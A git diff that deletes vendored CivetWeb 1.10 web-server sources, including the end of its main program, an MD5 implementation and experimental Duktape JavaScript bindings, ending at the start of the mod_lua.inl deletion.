-	if (![[NSWorkspace sharedWorkspace] openFile:path
-	                             withApplication:@"TextEdit"]) {
-		NSAlert *alert = [[[NSAlert alloc] init] autorelease];
-		[alert setAlertStyle:NSWarningAlertStyle];
-		[alert setMessageText:NSLocalizedString(@"Unable to open config file.",
-		                                        "")];
-		[alert setInformativeText:path];
-		(void)[alert runModal];
-	}
-}
-- (void)shutDown
-{
-	[NSApp terminate:nil];
-}
-@end
-
-int
-main(int argc, char *argv[])
-{
-	init_server_name(argc, (const char **)argv);
-	init_system_info();
-	start_civetweb(argc, argv);
-
-	[NSAutoreleasePool new];
-	[NSApplication sharedApplication];
-
-	/* Add delegate to process menu item actions */
-	Civetweb *myDelegate = [[Civetweb alloc] autorelease];
-	[NSApp setDelegate:myDelegate];
-
-	/* Run this app as agent */
-	ProcessSerialNumber psn = {0, kCurrentProcess};
-	TransformProcessType(&psn, kProcessTransformToBackgroundApplication);
-	SetFrontProcess(&psn);
-
-	/* Add status bar menu */
-	id menu = [[NSMenu new] autorelease];
-
-	/* Add version menu item */
-	[menu
-	    addItem:
-	        [[[NSMenuItem alloc]
-	            /*initWithTitle:[NSString stringWithFormat:@"%s", server_name]*/
-	            initWithTitle:[NSString stringWithUTF8String:g_server_name]
-	                   action:@selector(noexist)
-	            keyEquivalent:@""] autorelease]];
-
-	/* Add configuration menu item */
-	[menu addItem:[[[NSMenuItem alloc] initWithTitle:@"Edit configuration"
-	                                          action:@selector(editConfig)
-	                                   keyEquivalent:@""] autorelease]];
-
-	/* Add connect menu item */
-	[menu
-	    addItem:[[[NSMenuItem alloc] initWithTitle:@"Open web root in a browser"
-	                                        action:@selector(openBrowser)
-	                                 keyEquivalent:@""] autorelease]];
-
-	/* Separator */
-	[menu addItem:[NSMenuItem separatorItem]];
-
-	/* Add quit menu item */
-	[menu addItem:[[[NSMenuItem alloc] initWithTitle:@"Quit"
-	                                          action:@selector(shutDown)
-	                                   keyEquivalent:@"q"] autorelease]];
-
-	/* Attach menu to the status bar */
-	id item = [[[NSStatusBar systemStatusBar]
-	    statusItemWithLength:NSVariableStatusItemLength] retain];
-	[item setHighlightMode:YES];
-	[item setImage:[NSImage imageNamed:@"civetweb_22x22.png"]];
-	[item setMenu:menu];
-
-	/* Run the app */
-	[NSApp activateIgnoringOtherApps:YES];
-	[NSApp run];
-
-	stop_civetweb();
-	free_system_info();
-
-	return EXIT_SUCCESS;
-}
-
-#else
-
-int
-main(int argc, char *argv[])
-{
-	init_server_name(argc, (const char **)argv);
-	init_system_info();
-	start_civetweb(argc, argv);
-	fprintf(stdout,
-	        "%s started on port(s) %s with web root [%s]\n",
-	        g_server_name,
-	        mg_get_option(g_ctx, "listening_ports"),
-	        mg_get_option(g_ctx, "document_root"));
-
-	while (g_exit_flag == 0) {
-		sleep(1);
-	}
-
-	fprintf(stdout,
-	        "Exiting on signal %d, waiting for all threads to finish...",
-	        g_exit_flag);
-	fflush(stdout);
-	stop_civetweb();
-	fprintf(stdout, "%s", " done.\n");
-
-	free_system_info();
-
-	return EXIT_SUCCESS;
-}
-#endif /* _WIN32 */
diff --git a/thirdparty/civetweb-1.10/src/md5.inl b/thirdparty/civetweb-1.10/src/md5.inl
deleted file mode 100644
index be7192b..0000000
--- a/thirdparty/civetweb-1.10/src/md5.inl
+++ /dev/null
@@ -1,471 +0,0 @@
-/*
- * This an amalgamation of md5.c and md5.h into a single file
- * with all static declaration to reduce linker conflicts
- * in Civetweb.
- *
- * The MD5_STATIC declaration was added to facilitate static
- * inclusion.
- * No Face Press, LLC
- */
-
-/* $Id: md5.h,v 1.4 2002/04/13 19:20:28 lpd Exp $ */
-/*
-  Independent implementation of MD5 (RFC 1321).
-
-  This code implements the MD5 Algorithm defined in RFC 1321, whose
-  text is available at
-    http://www.ietf.org/rfc/rfc1321.txt
-  The code is derived from the text of the RFC, including the test suite
-  (section A.5) but excluding the rest of Appendix A.  It does not include
-  any code or documentation that is identified in the RFC as being
-  copyrighted.
-
-  The original and principal author of md5.h is L. Peter Deutsch
-  <ghost@aladdin.com>.  Other authors are noted in the change history
-  that follows (in reverse chronological order):
-
-  2002-04-13 lpd Removed support for non-ANSI compilers; removed
-    references to Ghostscript; clarified derivation from RFC 1321;
-    now handles byte order either statically or dynamically.
-  1999-11-04 lpd Edited comments slightly for automatic TOC extraction.
-  1999-10-18 lpd Fixed typo in header comment (ansi2knr rather than md5);
-    added conditionalization for C++ compilation from Martin
-    Purschke <purschke@bnl.gov>.
-  1999-05-03 lpd Original version.
- */
-
-#ifndef md5_INCLUDED
-#define md5_INCLUDED
-
-/*
- * This package supports both compile-time and run-time determination of CPU
- * byte order.  If ARCH_IS_BIG_ENDIAN is defined as 0, the code will be
- * compiled to run only on little-endian CPUs; if ARCH_IS_BIG_ENDIAN is
- * defined as non-zero, the code will be compiled to run only on big-endian
- * CPUs; if ARCH_IS_BIG_ENDIAN is not defined, the code will be compiled to
- * run on either big- or little-endian CPUs, but will run slightly less
- * efficiently on either one than if ARCH_IS_BIG_ENDIAN is defined.
- */
-
-typedef unsigned char md5_byte_t; /* 8-bit byte */
-typedef unsigned int md5_word_t;  /* 32-bit word */
-
-/* Define the state of the MD5 Algorithm. */
-typedef struct md5_state_s {
-	md5_word_t count[2]; /* message length in bits, lsw first */
-	md5_word_t abcd[4];  /* digest buffer */
-	md5_byte_t buf[64];  /* accumulate block */
-} md5_state_t;
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-/* Initialize the algorithm. */
-MD5_STATIC void md5_init(md5_state_t *pms);
-
-/* Append a string to the message. */
-MD5_STATIC void
-md5_append(md5_state_t *pms, const md5_byte_t *data, size_t nbytes);
-
-/* Finish the message and return the digest. */
-MD5_STATIC void md5_finish(md5_state_t *pms, md5_byte_t digest[16]);
-
-#ifdef __cplusplus
-} /* end extern "C" */
-#endif
-
-#endif /* md5_INCLUDED */
-
-/*
-  Copyright (C) 1999, 2000, 2002 Aladdin Enterprises.  All rights reserved.
-
-  This software is provided 'as-is', without any express or implied
-  warranty.  In no event will the authors be held liable for any damages
-  arising from the use of this software.
-
-  Permission is granted to anyone to use this software for any purpose,
-  including commercial applications, and to alter it and redistribute it
-  freely, subject to the following restrictions:
-
-  1. The origin of this software must not be misrepresented; you must not
-     claim that you wrote the original software. If you use this software
-     in a product, an acknowledgment in the product documentation would be
-     appreciated but is not required.
-  2. Altered source versions must be plainly marked as such, and must not be
-     misrepresented as being the original software.
-  3. This notice may not be removed or altered from any source distribution.
-
-  L. Peter Deutsch
-  ghost@aladdin.com
-
- */
-/* $Id: md5.c,v 1.6 2002/04/13 19:20:28 lpd Exp $ */
-/*
-  Independent implementation of MD5 (RFC 1321).
-
-  This code implements the MD5 Algorithm defined in RFC 1321, whose
-  text is available at
-    http://www.ietf.org/rfc/rfc1321.txt
-  The code is derived from the text of the RFC, including the test suite
-  (section A.5) but excluding the rest of Appendix A.  It does not include
-  any code or documentation that is identified in the RFC as being
-  copyrighted.
-
-  The original and principal author of md5.c is L. Peter Deutsch
-  <ghost@aladdin.com>.  Other authors are noted in the change history
-  that follows (in reverse chronological order):
-
-  2002-04-13 lpd Clarified derivation from RFC 1321; now handles byte order
-    either statically or dynamically; added missing #include <string.h>
-    in library.
-  2002-03-11 lpd Corrected argument list for main(), and added int return
-    type, in test program and T value program.
-  2002-02-21 lpd Added missing #include <stdio.h> in test program.
-  2000-07-03 lpd Patched to eliminate warnings about "constant is
-    unsigned in ANSI C, signed in traditional"; made test program
-    self-checking.
-  1999-11-04 lpd Edited comments slightly for automatic TOC extraction.
-  1999-10-18 lpd Fixed typo in header comment (ansi2knr rather than md5).
-  1999-05-03 lpd Original version.
- */
-
-#ifndef MD5_STATIC
-#include <string.h>
-#endif
-
-#undef BYTE_ORDER /* 1 = big-endian, -1 = little-endian, 0 = unknown */
-#ifdef ARCH_IS_BIG_ENDIAN
-#define BYTE_ORDER (ARCH_IS_BIG_ENDIAN ? 1 : -1)
-#else
-#define BYTE_ORDER (0)
-#endif
-
-#define T_MASK ((md5_word_t)~0)
-#define T1 /* 0xd76aa478 */ (T_MASK ^ 0x28955b87)
-#define T2 /* 0xe8c7b756 */ (T_MASK ^ 0x173848a9)
-#define T3 (0x242070db)
-#define T4 /* 0xc1bdceee */ (T_MASK ^ 0x3e423111)
-#define T5 /* 0xf57c0faf */ (T_MASK ^ 0x0a83f050)
-#define T6 (0x4787c62a)
-#define T7 /* 0xa8304613 */ (T_MASK ^ 0x57cfb9ec)
-#define T8 /* 0xfd469501 */ (T_MASK ^ 0x02b96afe)
-#define T9 (0x698098d8)
-#define T10 /* 0x8b44f7af */ (T_MASK ^ 0x74bb0850)
-#define T11 /* 0xffff5bb1 */ (T_MASK ^ 0x0000a44e)
-#define T12 /* 0x895cd7be */ (T_MASK ^ 0x76a32841)
-#define T13 (0x6b901122)
-#define T14 /* 0xfd987193 */ (T_MASK ^ 0x02678e6c)
-#define T15 /* 0xa679438e */ (T_MASK ^ 0x5986bc71)
-#define T16 (0x49b40821)
-#define T17 /* 0xf61e2562 */ (T_MASK ^ 0x09e1da9d)
-#define T18 /* 0xc040b340 */ (T_MASK ^ 0x3fbf4cbf)
-#define T19 (0x265e5a51)
-#define T20 /* 0xe9b6c7aa */ (T_MASK ^ 0x16493855)
-#define T21 /* 0xd62f105d */ (T_MASK ^ 0x29d0efa2)
-#define T22 (0x02441453)
-#define T23 /* 0xd8a1e681 */ (T_MASK ^ 0x275e197e)
-#define T24 /* 0xe7d3fbc8 */ (T_MASK ^ 0x182c0437)
-#define T25 (0x21e1cde6)
-#define T26 /* 0xc33707d6 */ (T_MASK ^ 0x3cc8f829)
-#define T27 /* 0xf4d50d87 */ (T_MASK ^ 0x0b2af278)
-#define T28 (0x455a14ed)
-#define T29 /* 0xa9e3e905 */ (T_MASK ^ 0x561c16fa)
-#define T30 /* 0xfcefa3f8 */ (T_MASK ^ 0x03105c07)
-#define T31 (0x676f02d9)
-#define T32 /* 0x8d2a4c8a */ (T_MASK ^ 0x72d5b375)
-#define T33 /* 0xfffa3942 */ (T_MASK ^ 0x0005c6bd)
-#define T34 /* 0x8771f681 */ (T_MASK ^ 0x788e097e)
-#define T35 (0x6d9d6122)
-#define T36 /* 0xfde5380c */ (T_MASK ^ 0x021ac7f3)
-#define T37 /* 0xa4beea44 */ (T_MASK ^ 0x5b4115bb)
-#define T38 (0x4bdecfa9)
-#define T39 /* 0xf6bb4b60 */ (T_MASK ^ 0x0944b49f)
-#define T40 /* 0xbebfbc70 */ (T_MASK ^ 0x4140438f)
-#define T41 (0x289b7ec6)
-#define T42 /* 0xeaa127fa */ (T_MASK ^ 0x155ed805)
-#define T43 /* 0xd4ef3085 */ (T_MASK ^ 0x2b10cf7a)
-#define T44 (0x04881d05)
-#define T45 /* 0xd9d4d039 */ (T_MASK ^ 0x262b2fc6)
-#define T46 /* 0xe6db99e5 */ (T_MASK ^ 0x1924661a)
-#define T47 (0x1fa27cf8)
-#define T48 /* 0xc4ac5665 */ (T_MASK ^ 0x3b53a99a)
-#define T49 /* 0xf4292244 */ (T_MASK ^ 0x0bd6ddbb)
-#define T50 (0x432aff97)
-#define T51 /* 0xab9423a7 */ (T_MASK ^ 0x546bdc58)
-#define T52 /* 0xfc93a039 */ (T_MASK ^ 0x036c5fc6)
-#define T53 (0x655b59c3)
-#define T54 /* 0x8f0ccc92 */ (T_MASK ^ 0x70f3336d)
-#define T55 /* 0xffeff47d */ (T_MASK ^ 0x00100b82)
-#define T56 /* 0x85845dd1 */ (T_MASK ^ 0x7a7ba22e)
-#define T57 (0x6fa87e4f)
-#define T58 /* 0xfe2ce6e0 */ (T_MASK ^ 0x01d3191f)
-#define T59 /* 0xa3014314 */ (T_MASK ^ 0x5cfebceb)
-#define T60 (0x4e0811a1)
-#define T61 /* 0xf7537e82 */ (T_MASK ^ 0x08ac817d)
-#define T62 /* 0xbd3af235 */ (T_MASK ^ 0x42c50dca)
-#define T63 (0x2ad7d2bb)
-#define T64 /* 0xeb86d391 */ (T_MASK ^ 0x14792c6e)
-
-static void
-md5_process(md5_state_t *pms, const md5_byte_t *data /*[64]*/)
-{
-	md5_word_t a = pms->abcd[0], b = pms->abcd[1], c = pms->abcd[2],
-	           d = pms->abcd[3];
-	md5_word_t t;
-#if BYTE_ORDER > 0
-	/* Define storage only for big-endian CPUs. */
-	md5_word_t X[16];
-#else
-	/* Define storage for little-endian or both types of CPUs. */
-	md5_word_t xbuf[16];
-	const md5_word_t *X;
-#endif
-
-	{
-#if BYTE_ORDER == 0
-		/*
-		 * Determine dynamically whether this is a big-endian or
-		 * little-endian machine, since we can use a more efficient
-		 * algorithm on the latter.
-		 */
-		static const int w = 1;
-
-		if (*((const md5_byte_t *)&w)) /* dynamic little-endian */
-#endif
-#if BYTE_ORDER <= 0 /* little-endian */
-		{
-			/*
-			 * On little-endian machines, we can process properly aligned
-			 * data without copying it.
-			 */
-			if (!((data - (const md5_byte_t *)0) & 3)) {
-				/* data are properly aligned, a direct assignment is possible */
-				/* cast through a (void *) should avoid a compiler warning,
-				   see
-				   https://github.com/bel2125/civetweb/issues/94#issuecomment-98112861
-				   */
-				X = (const md5_word_t *)(const void *)data;
-			} else {
-				/* not aligned */
-				memcpy(xbuf, data, 64);
-				X = xbuf;
-			}
-		}
-#endif
-#if BYTE_ORDER == 0
-		else /* dynamic big-endian */
-#endif
-#if BYTE_ORDER >= 0 /* big-endian */
-		{
-			/*
-			 * On big-endian machines, we must arrange the bytes in the
-			 * right order.
-			 */
-			const md5_byte_t *xp = data;
-			int i;
-
-#if BYTE_ORDER == 0
-			X = xbuf; /* (dynamic only) */
-#else
-#define xbuf X /* (static only) */
-#endif
-			for (i = 0; i < 16; ++i, xp += 4)
-				xbuf[i] = (md5_word_t)(xp[0]) + (md5_word_t)(xp[1] << 8)
-				          + (md5_word_t)(xp[2] << 16)
-				          + (md5_word_t)(xp[3] << 24);
-		}
-#endif
-	}
-
-#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32 - (n))))
-
-/* Round 1. */
-/* Let [abcd k s i] denote the operation
-   a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */
-#define F(x, y, z) (((x) & (y)) | (~(x) & (z)))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + F(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 0, 7, T1);
-	SET(d, a, b, c, 1, 12, T2);
-	SET(c, d, a, b, 2, 17, T3);
-	SET(b, c, d, a, 3, 22, T4);
-	SET(a, b, c, d, 4, 7, T5);
-	SET(d, a, b, c, 5, 12, T6);
-	SET(c, d, a, b, 6, 17, T7);
-	SET(b, c, d, a, 7, 22, T8);
-	SET(a, b, c, d, 8, 7, T9);
-	SET(d, a, b, c, 9, 12, T10);
-	SET(c, d, a, b, 10, 17, T11);
-	SET(b, c, d, a, 11, 22, T12);
-	SET(a, b, c, d, 12, 7, T13);
-	SET(d, a, b, c, 13, 12, T14);
-	SET(c, d, a, b, 14, 17, T15);
-	SET(b, c, d, a, 15, 22, T16);
-#undef SET
-
-/* Round 2. */
-/* Let [abcd k s i] denote the operation
-     a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */
-#define G(x, y, z) (((x) & (z)) | ((y) & ~(z)))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + G(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 1, 5, T17);
-	SET(d, a, b, c, 6, 9, T18);
-	SET(c, d, a, b, 11, 14, T19);
-	SET(b, c, d, a, 0, 20, T20);
-	SET(a, b, c, d, 5, 5, T21);
-	SET(d, a, b, c, 10, 9, T22);
-	SET(c, d, a, b, 15, 14, T23);
-	SET(b, c, d, a, 4, 20, T24);
-	SET(a, b, c, d, 9, 5, T25);
-	SET(d, a, b, c, 14, 9, T26);
-	SET(c, d, a, b, 3, 14, T27);
-	SET(b, c, d, a, 8, 20, T28);
-	SET(a, b, c, d, 13, 5, T29);
-	SET(d, a, b, c, 2, 9, T30);
-	SET(c, d, a, b, 7, 14, T31);
-	SET(b, c, d, a, 12, 20, T32);
-#undef SET
-
-/* Round 3. */
-/* Let [abcd k s t] denote the operation
-     a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */
-#define H(x, y, z) ((x) ^ (y) ^ (z))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + H(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 5, 4, T33);
-	SET(d, a, b, c, 8, 11, T34);
-	SET(c, d, a, b, 11, 16, T35);
-	SET(b, c, d, a, 14, 23, T36);
-	SET(a, b, c, d, 1, 4, T37);
-	SET(d, a, b, c, 4, 11, T38);
-	SET(c, d, a, b, 7, 16, T39);
-	SET(b, c, d, a, 10, 23, T40);
-	SET(a, b, c, d, 13, 4, T41);
-	SET(d, a, b, c, 0, 11, T42);
-	SET(c, d, a, b, 3, 16, T43);
-	SET(b, c, d, a, 6, 23, T44);
-	SET(a, b, c, d, 9, 4, T45);
-	SET(d, a, b, c, 12, 11, T46);
-	SET(c, d, a, b, 15, 16, T47);
-	SET(b, c, d, a, 2, 23, T48);
-#undef SET
-
-/* Round 4. */
-/* Let [abcd k s t] denote the operation
-     a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */
-#define I(x, y, z) ((y) ^ ((x) | ~(z)))
-#define SET(a, b, c, d, k, s, Ti)                                              \
-	t = a + I(b, c, d) + X[k] + Ti;                                            \
-	a = ROTATE_LEFT(t, s) + b
-
-	/* Do the following 16 operations. */
-	SET(a, b, c, d, 0, 6, T49);
-	SET(d, a, b, c, 7, 10, T50);
-	SET(c, d, a, b, 14, 15, T51);
-	SET(b, c, d, a, 5, 21, T52);
-	SET(a, b, c, d, 12, 6, T53);
-	SET(d, a, b, c, 3, 10, T54);
-	SET(c, d, a, b, 10, 15, T55);
-	SET(b, c, d, a, 1, 21, T56);
-	SET(a, b, c, d, 8, 6, T57);
-	SET(d, a, b, c, 15, 10, T58);
-	SET(c, d, a, b, 6, 15, T59);
-	SET(b, c, d, a, 13, 21, T60);
-	SET(a, b, c, d, 4, 6, T61);
-	SET(d, a, b, c, 11, 10, T62);
-	SET(c, d, a, b, 2, 15, T63);
-	SET(b, c, d, a, 9, 21, T64);
-#undef SET
-
-	/* Then perform the following additions. (That is increment each
-	   of the four registers by the value it had before this block
-	   was started.) */
-	pms->abcd[0] += a;
-	pms->abcd[1] += b;
-	pms->abcd[2] += c;
-	pms->abcd[3] += d;
-}
-
-MD5_STATIC void
-md5_init(md5_state_t *pms)
-{
-	pms->count[0] = pms->count[1] = 0;
-	pms->abcd[0] = 0x67452301;
-	pms->abcd[1] = /*0xefcdab89*/ T_MASK ^ 0x10325476;
-	pms->abcd[2] = /*0x98badcfe*/ T_MASK ^ 0x67452301;
-	pms->abcd[3] = 0x10325476;
-}
-
-MD5_STATIC void
-md5_append(md5_state_t *pms, const md5_byte_t *data, size_t nbytes)
-{
-	const md5_byte_t *p = data;
-	size_t left = nbytes;
-	size_t offset = (pms->count[0] >> 3) & 63;
-	md5_word_t nbits = (md5_word_t)(nbytes << 3);
-
-	if (nbytes <= 0)
-		return;
-
-	/* Update the message length. */
-	pms->count[1] += (md5_word_t)(nbytes >> 29);
-	pms->count[0] += nbits;
-	if (pms->count[0] < nbits)
-		pms->count[1]++;
-
-	/* Process an initial partial block. */
-	if (offset) {
-		size_t copy = (offset + nbytes > 64 ? 64 - offset : nbytes);
-
-		memcpy(pms->buf + offset, p, copy);
-		if (offset + copy < 64)
-			return;
-		p += copy;
-		left -= copy;
-		md5_process(pms, pms->buf);
-	}
-
-	/* Process full blocks. */
-	for (; left >= 64; p += 64, left -= 64)
-		md5_process(pms, p);
-
-	/* Process a final partial block. */
-	if (left)
-		memcpy(pms->buf, p, left);
-}
-
-MD5_STATIC void
-md5_finish(md5_state_t *pms, md5_byte_t digest[16])
-{
-	static const md5_byte_t pad[64] = {0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-	                                   0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
-	md5_byte_t data[8];
-	int i;
-
-	/* Save the length before padding. */
-	for (i = 0; i < 8; ++i)
-		data[i] = (md5_byte_t)(pms->count[i >> 2] >> ((i & 3) << 3));
-	/* Pad to 56 bytes mod 64. */
-	md5_append(pms, pad, ((55 - (pms->count[0] >> 3)) & 63) + 1);
-	/* Append the length. */
-	md5_append(pms, data, 8);
-	for (i = 0; i < 16; ++i)
-		digest[i] = (md5_byte_t)(pms->abcd[i >> 2] >> ((i & 3) << 3));
-}
-
-
-/* End of md5.inl */
diff --git a/thirdparty/civetweb-1.10/src/mod_duktape.inl b/thirdparty/civetweb-1.10/src/mod_duktape.inl
deleted file mode 100644
index 85e822a..0000000
--- a/thirdparty/civetweb-1.10/src/mod_duktape.inl
+++ /dev/null
@@ -1,262 +0,0 @@
-/* This file is part of the CivetWeb web server.
- * See https://github.com/civetweb/civetweb/
- * (C) 2015-2017 by the CivetWeb authors, MIT license.
- */
-
-#include "duktape.h"
-
-/* TODO: the mg context should be added to duktape as well */
-/* Alternative: redefine a new, clean API from scratch (instead of using mg),
- * or at least do not add problematic functions. */
-/* For evaluation purposes, currently only "send" is supported.
- * All other ~50 functions will be added later. */
-
-/* Note: This is only experimental support, so the API may still change. */
-
-static const char *civetweb_conn_id = "\xFF"
-                                      "civetweb_conn";
-static const char *civetweb_ctx_id = "\xFF"
-                                     "civetweb_ctx";
-
-
-static void *
-mg_duk_mem_alloc(void *udata, duk_size_t size)
-{
-	return mg_malloc_ctx(size, (struct mg_context *)udata);
-}
-
-
-static void *
-mg_duk_mem_realloc(void *udata, void *ptr, duk_size_t newsize)
-{
-	return mg_realloc_ctx(ptr, newsize, (struct mg_context *)udata);
-}
-
-
-static void
-mg_duk_mem_free(void *udata, void *ptr)
-{
-	(void)udata;
-	mg_free(ptr);
-}
-
-
-static void
-mg_duk_fatal_handler(duk_context *duk_ctx, duk_errcode_t code, const char *msg)
-{
-	/* Script is called "protected" (duk_peval_file), so script errors should
-	 * never yield in a call to this function. Maybe calls prior to executing
-	 * the script could raise a fatal error. */
-	struct mg_connection *conn;
-
-	duk_push_global_stash(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-
-	mg_cry(conn, "JavaScript fatal (%u): %s", (unsigned)code, msg);
-}
-
-
-static duk_ret_t
-duk_itf_write(duk_context *duk_ctx)
-{
-	struct mg_connection *conn;
-	duk_double_t ret;
-	duk_size_t len = 0;
-	const char *val = duk_require_lstring(duk_ctx, -1, &len);
-
-	/*
-	    duk_push_global_stash(duk_ctx);
-	    duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	    conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-	*/
-	duk_push_current_function(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-
-	if (!conn) {
-		duk_error(duk_ctx,
-		          DUK_ERR_INTERNAL_ERROR,
-		          "function not available without connection object");
-		/* probably never reached, but satisfies static code analysis */
-		return DUK_RET_INTERNAL_ERROR;
-	}
-
-	ret = mg_write(conn, val, len);
-
-	duk_push_number(duk_ctx, ret);
-	return 1;
-}
-
-
-static duk_ret_t
-duk_itf_read(duk_context *duk_ctx)
-{
-	struct mg_connection *conn;
-	char buf[1024];
-	int len;
-
-	duk_push_global_stash(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_conn_id);
-	conn = (struct mg_connection *)duk_to_pointer(duk_ctx, -1);
-
-	if (!conn) {
-		duk_error(duk_ctx,
-		          DUK_ERR_INTERNAL_ERROR,
-		          "function not available without connection object");
-		/* probably never reached, but satisfies static code analysis */
-		return DUK_RET_INTERNAL_ERROR;
-	}
-
-	len = mg_read(conn, buf, sizeof(buf));
-
-	duk_push_lstring(duk_ctx, buf, len);
-	return 1;
-}
-
-
-static duk_ret_t
-duk_itf_getoption(duk_context *duk_ctx)
-{
-	struct mg_context *cv_ctx;
-	const char *ret;
-	duk_size_t len = 0;
-	const char *val = duk_require_lstring(duk_ctx, -1, &len);
-
-	duk_push_current_function(duk_ctx);
-	duk_get_prop_string(duk_ctx, -1, civetweb_ctx_id);
-	cv_ctx = (struct mg_context *)duk_to_pointer(duk_ctx, -1);
-
-	if (!cv_ctx) {
-		duk_error(duk_ctx,
-		          DUK_ERR_INTERNAL_ERROR,
-		          "function not available without connection object");
-		/* probably never reached, but satisfies static code analysis */
-		return DUK_RET_INTERNAL_ERROR;
-	}
-
-	ret = mg_get_option(cv_ctx, val);
-	if (ret) {
-		duk_push_string(duk_ctx, ret);
-	} else {
-		duk_push_null(duk_ctx);
-	}
-
-	return 1;
-}
-
-
-static void
-mg_exec_duktape_script(struct mg_connection *conn, const char *script_name)
-{
-	int i;
-	duk_context *duk_ctx = NULL;
-
-	conn->must_close = 1;
-
-	/* Create Duktape interpreter state */
-	duk_ctx = duk_create_heap(mg_duk_mem_alloc,
-	                          mg_duk_mem_realloc,
-	                          mg_duk_mem_free,
-	                          (void *)conn->ctx,
-	                          mg_duk_fatal_handler);
-	if (!duk_ctx) {
-		mg_cry(conn, "Failed to create a Duktape heap.");
-		goto exec_duktape_finished;
-	}
-
-	/* Add "conn" object */
-	duk_push_global_object(duk_ctx);
-	duk_push_object(duk_ctx); /* create a new table/object ("conn") */
-
-	duk_push_c_function(duk_ctx, duk_itf_write, 1 /* 1 = nargs */);
-	duk_push_pointer(duk_ctx, (void *)conn);
-	duk_put_prop_string(duk_ctx, -2, civetweb_conn_id);
-	duk_put_prop_string(duk_ctx, -2, "write"); /* add function conn.write */
-
-	duk_push_c_function(duk_ctx, duk_itf_read, 0 /* 0 = nargs */);
-	duk_push_pointer(duk_ctx, (void *)conn);
-	duk_put_prop_string(duk_ctx, -2, civetweb_conn_id);
-	duk_put_prop_string(duk_ctx, -2, "read"); /* add function conn.read */
-
-	duk_push_string(duk_ctx, conn->request_info.request_method);
-	duk_put_prop_string(duk_ctx,
-	                    -2,
-	                    "request_method"); /* add string conn.r... */
-
-	duk_push_string(duk_ctx, conn->request_info.request_uri);
-	duk_put_prop_string(duk_ctx, -2, "request_uri");
-
-	duk_push_string(duk_ctx, conn->request_info.local_uri);
-	duk_put_prop_string(duk_ctx, -2, "uri");
-
-	duk_push_string(duk_ctx, conn->request_info.http_version);
-	duk_put_prop_string(duk_ctx, -2, "http_version");
-
-	duk_push_string(duk_ctx, conn->request_info.query_string);
-	duk_put_prop_string(duk_ctx, -2, "query_string");
-
-	duk_push_string(duk_ctx, conn->request_info.remote_addr);
-	duk_put_prop_string(duk_ctx, -2, "remote_addr");
-
-	duk_push_int(duk_ctx, conn->request_info.remote_port);
-	duk_put_prop_string(duk_ctx, -2, "remote_port");
-
-	duk_push_int(duk_ctx, ntohs(conn->client.lsa.sin.sin_port));
-	duk_put_prop_string(duk_ctx, -2, "server_port");
-
-	duk_push_object(duk_ctx); /* subfolder "conn.http_headers" */
-	for (i = 0; i < conn->request_info.num_headers; i++) {
-		duk_push_string(duk_ctx, conn->request_info.http_headers[i].value);
-		duk_put_prop_string(duk_ctx,
-		                    -2,
-		                    conn->request_info.http_headers[i].name);
-	}
-	duk_put_prop_string(duk_ctx, -2, "http_headers");
-
-	duk_put_prop_string(duk_ctx, -2, "conn"); /* call the table "conn" */
-
-	/* Add "civetweb" object */
-	duk_push_global_object(duk_ctx);
-	duk_push_object(duk_ctx); /* create a new table/object ("conn") */
-
-	duk_push_string(duk_ctx, CIVETWEB_VERSION);
-	duk_put_prop_string(duk_ctx, -2, "version");
-
-	duk_push_string(duk_ctx, script_name);
-	duk_put_prop_string(duk_ctx, -2, "script_name");
-
-	if (conn->ctx != NULL) {
-		duk_push_c_function(duk_ctx, duk_itf_getoption, 1 /* 1 = nargs */);
-		duk_push_pointer(duk_ctx, (void *)(conn->ctx));
-		duk_put_prop_string(duk_ctx, -2, civetweb_ctx_id);
-		duk_put_prop_string(duk_ctx,
-		                    -2,
-		                    "getoption"); /* add function conn.write */
-
-		if (conn->ctx->systemName != NULL) {
-			duk_push_string(duk_ctx, conn->ctx->systemName);
-			duk_put_prop_string(duk_ctx, -2, "system");
-		}
-	}
-
-	duk_put_prop_string(duk_ctx,
-	                    -2,
-	                    "civetweb"); /* call the table "civetweb" */
-
-	duk_push_global_stash(duk_ctx);
-	duk_push_pointer(duk_ctx, (void *)conn);
-	duk_put_prop_string(duk_ctx, -2, civetweb_conn_id);
-
-	if (duk_peval_file(duk_ctx, script_name) != 0) {
-		mg_cry(conn, "%s", duk_safe_to_string(duk_ctx, -1));
-		goto exec_duktape_finished;
-	}
-	duk_pop(duk_ctx); /* ignore result */
-
-exec_duktape_finished:
-	duk_destroy_heap(duk_ctx);
-}
-
-
-/* End of mod_duktape.inl */
diff --git a/thirdparty/civetweb-1.10/src/mod_lua.inl b/thirdparty/civetweb-1.10/src/mod_lua.inl
deleted file mode 100644
index fece6e8..0000000
--- a/thirdparty/civetweb-1.10/src/mod_lua.inl
+++ /dev/null
@@ -1,2371 +0,0 @@
